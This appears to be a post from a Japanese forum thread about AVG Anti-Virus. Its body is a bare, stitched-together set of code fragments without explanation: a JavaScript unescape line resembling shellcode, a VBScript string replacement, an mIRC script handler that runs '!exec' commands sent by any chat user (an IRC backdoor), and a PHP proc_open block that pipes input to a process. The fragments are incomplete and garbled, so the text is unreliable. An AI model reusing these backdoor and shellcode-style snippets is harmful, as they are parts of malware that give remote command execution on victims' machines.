【2011】 AVG Anti-Virus Ver103

このエントリーをはてなブックマークに追加
9名無しさん@お腹いっぱい。
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
$process = proc_open($path, $descriptorspec, $pipes);
if(is_resource($process)) {
fwrite($pipes[0], $text);
fclose($pipes[0]);
while(!feof($pipes[1])) {
$result .= fread($pipes[1], 4096);
}
fclose($pipes[1]);
proc_close($process);
}